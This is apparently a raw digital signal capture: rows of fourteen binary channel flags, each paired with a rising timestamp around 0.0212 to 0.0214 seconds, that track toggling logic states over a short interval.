1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1240852e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1240876e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1240900e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1240924e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1240948e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1240976e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1241000e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1241004e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,2.1241052e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1241076e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1241084e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1241100e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1241124e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1241148e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1241176e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1241200e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1241228e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,2.1241252e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1241276e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1241284e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1241324e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1241348e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1241404e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1241428e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1241452e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1241476e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1241500e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1241524e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1241532e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,2.1241548e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1241576e-02 1,0,0,0,1,1,0,0,0,0,0,0,0,0,2.1241580e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1241584e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1241600e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1241628e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1241652e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1241676e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1241680e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,2.1241724e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1241748e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1241756e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1241776e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1241800e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1241828e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1241852e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1241876e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1241900e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1241924e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1241948e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1241976e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1242000e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1242028e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1242052e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1242076e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1242100e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1242124e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1242148e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1242176e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1242200e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1242228e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1242252e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1242276e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1242300e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1242324e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1242348e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1242356e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,2.1242376e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1242400e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1242408e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1242452e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1242476e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1242524e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1242552e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1242576e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1242600e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1242628e-02 1,0,0,0,1,0,0,0,0,1,0,0,0,0,2.1242652e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1242656e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,2.1242676e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1242700e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1242708e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1242724e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1242748e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1242756e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,2.1242804e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1242828e-02 1,0,0,0,1,1,0,0,0,0,0,0,0,0,2.1242832e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1242836e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1242852e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1242876e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1242900e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1242924e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1242948e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1242976e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1243000e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1243028e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,2.1243076e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1243100e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1243108e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1243124e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1243148e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1243176e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1243200e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1243228e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1243252e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1243276e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1243300e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1243324e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1243348e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1243376e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1243400e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1243428e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1243452e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1243476e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1243500e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1243524e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1243548e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1243576e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1243600e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1243628e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1243652e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1243676e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1243700e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1243724e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1243748e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1243772e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1243796e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1243824e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1243848e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1243876e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1243900e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1243924e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1243948e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1243972e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1243996e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1244024e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1244048e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1244076e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1244100e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1244124e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1244148e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1244172e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1244196e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1244224e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1244248e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1244276e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1244300e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1244324e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1244348e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1244372e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1244396e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1244424e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1244448e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1244476e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1244500e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1244524e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1244548e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1244572e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1244596e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1244624e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1244648e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1244652e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,1,2.1369196e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,1,2.1369416e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,1,2.1369436e-02 0,1,0,0,1,1,0,0,0,1,0,1,0,1,2.1369460e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,1,2.1369480e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,1,2.1369820e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,1,2.1369844e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,1,2.1369852e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,1,2.1369868e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,1,2.1369896e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,1,2.1369920e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,1,2.1369948e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,1,2.1369972e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,1,2.1369996e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,1,2.1370020e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,1,2.1370044e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,1,2.1370068e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1370092e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1370096e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1370120e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1370148e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1370172e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1370196e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1370220e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1370244e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1370268e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1370296e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.1370300e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,2.1370348e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.1370372e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1370380e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1370396e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1370424e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1370444e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1370468e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1370496e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.1370524e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,2.1370572e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.1370596e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1370604e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1370624e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1370644e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1370668e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1370696e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1370724e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1370748e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1370772e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1370796e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1370824e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1370844e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1370868e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1370896e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.1370900e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,2.1370948e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.1370972e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1370980e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1370996e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1371024e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1371044e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1371072e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1371096e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1371120e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1371148e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1371172e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.1371176e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,2.1371220e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.1371244e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1371252e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1371272e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1371296e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1371320e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.1371348e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,2.1371396e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.1371420e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1371428e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1371444e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1371468e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1371496e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1371520e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1371548e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1371572e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1371596e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1371620e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1371644e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1371668e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1371696e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1371720e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1371748e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1371772e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1371796e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1371820e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1371844e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1371868e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1371896e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1371920e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.1371924e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,2.1371972e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.1371996e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1372004e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1372020e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1372044e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.1372052e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,2.1372096e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.1372124e-02 0,1,0,0,1,1,0,0,0,0,0,0,0,0,2.1372128e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1372132e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1372148e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1372172e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1372196e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1372220e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1372244e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1372268e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1372296e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1372320e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.1372324e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,2.1372372e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.1372396e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1372404e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1372420e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1372444e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1372468e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1372496e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1372520e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1372548e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1372572e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1372596e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1372620e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1372644e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1372668e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1372696e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1372720e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1372748e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1372772e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1372796e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1372820e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1372844e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1372868e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1372896e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1372920e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.1372948e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,2.1372996e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.1373020e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1373028e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1373044e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1373068e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1373096e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1373120e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1373148e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1373172e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1373196e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1373220e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.1373228e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,2.1373244e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.1373268e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,2.1373296e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.1373320e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1373328e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1373372e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1373396e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1373444e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1373472e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1373496e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1373520e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1373548e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1373572e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1373596e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1373620e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.1373628e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,2.1373672e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.1373696e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1373704e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1373724e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1373748e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1373772e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1373796e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1373820e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1373844e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1373868e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1373896e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1373920e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1373948e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1373972e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1373996e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1374020e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1374044e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1374068e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1374096e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1374120e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1374148e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1374172e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1374196e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1374224e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1374244e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1374268e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1374296e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1374324e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1374348e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.1374352e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,2.1374372e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.1374396e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,2.1374424e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.1374444e-02 0,1,0,0,1,1,0,0,0,0,0,0,0,0,2.1374452e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1374456e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1374496e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1374524e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1374572e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1374596e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1374624e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1374644e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1374668e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1374696e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.1374700e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,2.1374748e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.1374772e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1374780e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1374796e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1374824e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1374844e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1374868e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1374896e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1374920e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1374948e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1374972e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.1374976e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,2.1375024e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.1375044e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1375056e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1375072e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1375096e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1375120e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1375148e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1375172e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1375196e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1375220e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1375244e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1375268e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1375296e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1375320e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1375348e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1375372e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.1375396e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.1375420e-02 